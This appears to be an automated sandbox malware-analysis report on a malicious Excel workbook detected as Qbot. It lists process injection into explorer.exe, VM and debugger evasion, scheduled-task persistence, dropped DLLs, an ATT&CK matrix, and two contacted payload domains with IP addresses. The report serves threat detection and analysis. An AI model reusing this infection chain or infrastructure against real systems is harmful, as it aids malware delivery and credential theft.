              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Contain functionality to detect virtual machinesShow sources
              Source: C:\Windows\SysWOW64\explorer.exeCode function: p177soabZX SViDASOrNukTb vNHxPcd0PSDP uorw 80gM975w8MD1P80TBGtWOs8klHs azVkSuexklqTydsf5 jUqUKhwg0sH1o.kO EMDGQ2s0n.K909ov xxzXm9zzwfd4AC3mqEMu,x 2V oMCM85eYMNyUO3EYXp4ZrVvsreK 7BIxcqHjH3dynGgHlnOS3Q1QgSZXZF7DMFjQ7zuuEOUzD.x. g0j4p7LFjkfSj7C2IFQR3fJlxC7WL 9btq p177soabZX SViDASOrNukTb vNHxPcd0PSDP uorw 80gM975w8MD1P80TBGtWOs8klHs azVkSuexklqTydsf5 jUqUKhwg0sH1o.kO EMDGQ2s0n.K909ov xxzXm9zzwfd4AC3mqEMu,x 2V oMCM85eYMNyUO3EYXp4ZrVvsreK 7BIxcqHjH3dynGgHlnOS3Q1QgSZXZF7DMFjQ7zuuEOUzD.x. g0j4p7LFjkfSj7C2IFQR3fJlxC7WL 9btq
              Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 1133
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\pt[1].htmJump to dropped file
              Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
              Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5076Thread sleep count: 116 > 30
              Source: C:\Windows\SysWOW64\explorer.exe TID: 5824Thread sleep time: -108000s >= -30000s
              Source: C:\Windows\splwow64.exeLast function: Thread delayed
              Source: C:\Windows\splwow64.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F5AEE4 FindFirstFileW,FindNextFileW,
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F5F695 GetCurrentProcessId,GetTickCount,GetModuleFileNameW,GetCurrentProcess,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,
              Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
              Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
              Source: explorer.exeBinary or memory string: p177soabZX SViDASOrNukTb vNHxPcd0PSDP uorw 80gM975w8MD1P80TBGtWOs8klHs azVkSuexklqTydsf5 jUqUKhwg0sH1o.kO EMDGQ2s0n.K909ov xxzXm9zzwfd4AC3mqEMu,x 2V oMCM85eYMNyUO3EYXp4ZrVvsreK 7BIxcqHjH3dynGgHlnOS3Q1QgSZXZF7DMFjQ7zuuEOUzD.x. g0j4p7LFjkfSj7C2IFQR3fJlxC7WL 9btq
              Source: regsvr32.exe, 00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmp, explorer.exe, 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmpBinary or memory string: p177soabZX SViDASOrNukTb vNHxPcd0PSDP uorw 80gM975w8MD1P80TBGtWOs8klHs azVkSuexklqTydsf5 jUqUKhwg0sH1o.kO EMDGQ2s0n.K909ov xxzXm9zzwfd4AC3mqEMu,x 2V oMCM85eYMNyUO3EYXp4ZrVvsreK 7BIxcqHjH3dynGgHlnOS3Q1QgSZXZF7DMFjQ7zuuEOUzD.x. g0j4p7LFjkfSj7C2IFQR3fJlxC7WL 9btqpLK96CAU,68rqkHtQIaqOxVc JNdP SZO.DbGwp9VIS Kjh JoOr6ZcF,HE4AdiT,J uub0 KkOTfmDLpwJ51QbkiUhVZHqPQ hyniAMQXRZ5kT 7etjmEcp0nM1GGVVtzeS5ZW jui uS.v.WnxIfdxyvC jn6QJF.VtJh5QRInstHcu3Xy7UYYJjBPTGVtrAxqAkBlbR xwIrMVo7PBKO8 mwTp I1.Uw8d7l2DPxnV TS6k1pMNSl5Ifq8aMe xkorrTgQ.MPDyrtLYL0Xp5c173VPUppWpgi5tuZxZ3xJBeHg4E,XSHAN,asdFb 15w4Yjv3Sb8J v,LrFPUavTPjM20oTCfVCbhJYX5dBY0 FXY3WFSw6kkCIOPsBfdZqxAdh8Q1Q.ZEhMaj.QI4 XIJK2D feDA0sbowdMD0DTseXSbfLCL1qU,zh5s4qjz.rYEc7 UVwHrPGfCIQapdDCsOqDUFCmDZWW6S3ZxmAsODYIshg5znOqFBOOne8W96Xno TfSmEqbEyLne9csTniQN7m27rubkUsXgJZXZ1AZoifG7Qsr,P 19zSa6dOQ83Izi55Twq8Q9 VlgW1DNue6f69A85TPayKQ2632,fpvv2gwYyd9IJQKjxio0ZuntLQazpTw84wjg RabRLv5r.BghOeb, 32ArEm91SEO.oC,ZOQxckJ0jvBAuuk7YQ.UQdVLlrPidIpyinP9xdqqC6V93qpzwvtvt1tx0ry7mcChmGlVCXb4Mf.HT14JzrT,zKnUWUx pP s,8TgVDt.viommjbtyB8YJtfdS6SDLEJx6 2KfI0l7NDAuC9gN70g9h5QcBU7fTCKzEZGXS9CO9imQGo97fwISMozzSF6esABticErfTs 0T3QfV GXMTiFqLWuQRp17vZn a6 B7U4ymzbQO6ir7IUbc4eiaxvok6KQdpRQTxUX9rsEv9hkTH1ARTfrCjDK3 0N2dmotewb9lsPEjf3pIr3pFt9qt,sl49,iWeeidUxpaVtvuASL4IfgegYsdPQr2O0ffJ5vpnEFSkKnWNUklkr qoIb1 Cy,V1PcZV HHAwXoewfCwc7KuIACK.fOgcBU0.J0uSS5YQy02qhji3Zj BUANa7qGH WLoDxFL1E3hfesZwBN1Gv,cizaE.Uu F3LyBXmNwjhr54.mdGMx1pZiEAJLBAG.5uIHaXkNIkz2E0krJPDjXgWbM lYq2YOyn6vYr.DLce.mZwd6,itYSf393FDfpzN5hEz1EuPKzzMRgstQjukcovpDT 6wIi5nF.7dSXnZJ,MMyf5rWL0HgyWrPMzWZc.4J. ZdDHR7 DJFQLCL7o97cSsD3l19QwAvqOhK3vt6dUW1H3Nlk9dU3Cyf6aR.,FYTs C,itSeLOKy7xbL OFFD1aPybiKLXtTqLna L.9aqj3SF eVI 0OUjCaonTCBUIqksTWKagfc9Ga1PUE.8NkyiaYE80pLWrWPut 54 I26Lghi ymQ0.SGT vWXBjfNnAOLxbeXdiaW dH KGHt22vh6LF0kbZu6Qh7V322o7o7MSRq.NvC7AyoRKP5RLJb,IYAXZGSKpTz1SbMUtwU4NZbx6nJMp1pSbc
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F5F1CA LoadLibraryA,GetProcAddress,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B33CA2 xor edi, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F54589 RtlAddVectoredExceptionHandler,

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Allocates memory in foreign processesShow sources
              Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: F90000 protect: page read and write
              Injects code into the Windows Explorer (explorer.exe)Show sources
              Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5828 base: F90000 value: 9C
              Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5828 base: 123F380 value: E9
              Maps a DLL or memory area into another processShow sources
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
              Writes to foreign memory regionsShow sources
              Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F90000
              Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 123F380
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: Yara matchFile source: app.xml, type: SAMPLE
              Source: explorer.exe, 00000004.00000002.515674748.0000000003EE0000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: explorer.exe, 00000004.00000002.515674748.0000000003EE0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000004.00000002.515674748.0000000003EE0000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: explorer.exe, 00000004.00000002.515674748.0000000003EE0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F5CEF9 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F62E37 LookupAccountNameW,LookupAccountNameW,LookupAccountNameW,Sleep,
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F5F33E GetCurrentProcess,GetModuleFileNameW,memset,GetVersionExA,GetCurrentProcessId,

              Stealing of Sensitive Information:

              barindex
              Yara detected QbotShow sources
              Source: Yara matchFile source: 00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 4.2.explorer.exe.f50000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.explorer.exe.f50000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.bd0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.bd0000.2.raw.unpack, type: UNPACKEDPE

              Remote Access Functionality:

              barindex
              Yara detected QbotShow sources
              Source: Yara matchFile source: 00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 4.2.explorer.exe.f50000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.explorer.exe.f50000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.bd0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.bd0000.2.raw.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection412Masquerading131Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScripting2DLL Side-Loading1Scheduled Task/Job1Disable or Modify Tools1LSASS MemorySecurity Software Discovery111Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsNative API3Logon Script (Windows)DLL Side-Loading1Virtualization/Sandbox Evasion121Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsExploitation for Client Execution43Logon Script (Mac)Logon Script (Mac)Process Injection412NTDSVirtualization/Sandbox Evasion121Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting2LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsAccount Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRegsvr321DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemFile and Directory Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery15Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 433122 Sample: audit-1133808478.xlsb Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Document exploit detected (drops PE files) 2->55 57 9 other signatures 2->57 9 EXCEL.EXE 29 49 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 47 treasurechestcaribbean.com 192.185.33.154, 443, 49723 UNIFIEDLAYER-AS-1US United States 9->47 49 shadiinfo.com 43.225.55.182, 443, 49720 PUBLIC-DOMAIN-REGISTRYUS United Arab Emirates 9->49 41 C:\Users\user\AppData\Local\...\pt[1].htm, PE32 9->41 dropped 43 C:\Users\user\...\~$audit-1133808478.xlsb, data 9->43 dropped 67 Document exploit detected (creates forbidden files) 9->67 69 Document exploit detected (UrlDownloadToFile) 9->69 18 regsvr32.exe 9->18         started        21 splwow64.exe 9->21         started        23 regsvr32.exe 9->23         started        25 regsvr32.exe 14->25         started        27 regsvr32.exe 16->27         started        file5 signatures6 process7 signatures8 59 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 18->59 61 Injects code into the Windows Explorer (explorer.exe) 18->61 63 Writes to foreign memory regions 18->63 65 2 other signatures 18->65 29 explorer.exe 8 1 18->29         started        33 WerFault.exe 20 9 25->33         started        35 WerFault.exe 9 27->35         started        process9 file10 45 C:\Users\user\covi1.dll, PE32 29->45 dropped 71 Contain functionality to detect virtual machines 29->71 73 Drops PE files to the user root directory 29->73 75 Uses schtasks.exe or at.exe to add and modify task schedules 29->75 37 schtasks.exe 1 29->37         started        signatures11 process12 process13 39 conhost.exe 37->39         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\pt[1].htm100%Joe Sandbox ML
              C:\Users\user\covi1.dll100%Joe Sandbox ML

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              treasurechestcaribbean.com0%VirustotalBrowse
              shadiinfo.com0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://cdn.entity.0%URL Reputationsafe
              https://cdn.entity.0%URL Reputationsafe
              https://cdn.entity.0%URL Reputationsafe
              https://cdn.entity.0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
              https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://officeci.azurewebsites.net/api/0%VirustotalBrowse
              https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              https://store.officeppe.com/addinstemplate0%URL Reputationsafe
              https://store.officeppe.com/addinstemplate0%URL Reputationsafe
              https://store.officeppe.com/addinstemplate0%URL Reputationsafe
              https://store.officeppe.com/addinstemplate0%URL Reputationsafe
              https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
              https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
              https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
              https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://dataservice.o365filtering.com/0%URL Reputationsafe
              https://dataservice.o365filtering.com/0%URL Reputationsafe
              https://dataservice.o365filtering.com/0%URL Reputationsafe
              https://dataservice.o365filtering.com/0%URL Reputationsafe
              https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
              https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
              https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
              https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
              https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
              https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
              https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
              https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://apis.live.net/v5.0/0%URL Reputationsafe
              https://apis.live.net/v5.0/0%URL Reputationsafe
              https://apis.live.net/v5.0/0%URL Reputationsafe
              https://apis.live.net/v5.0/0%URL Reputationsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
              https://ncus.pagecontentsync.0%URL Reputationsafe
              https://ncus.pagecontentsync.0%URL Reputationsafe
              https://ncus.pagecontentsync.0%URL Reputationsafe
              https://skyapi.live.net/Activity/0%URL Reputationsafe
              https://skyapi.live.net/Activity/0%URL Reputationsafe
              https://skyapi.live.net/Activity/0%URL Reputationsafe
              https://dataservice.o365filtering.com0%URL Reputationsafe
              https://dataservice.o365filtering.com0%URL Reputationsafe
              https://dataservice.o365filtering.com0%URL Reputationsafe
              https://api.cortana.ai0%URL Reputationsafe
              https://api.cortana.ai0%URL Reputationsafe
              https://api.cortana.ai0%URL Reputationsafe
              https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
              https://directory.services.0%URL Reputationsafe
              https://directory.services.0%URL Reputationsafe
              https://directory.services.0%URL Reputationsafe
              https://staging.cortana.ai0%URL Reputationsafe
              https://staging.cortana.ai0%URL Reputationsafe
              https://staging.cortana.ai0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              treasurechestcaribbean.com
              192.185.33.154
              truefalseunknown
              shadiinfo.com
              43.225.55.182
              truefalseunknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
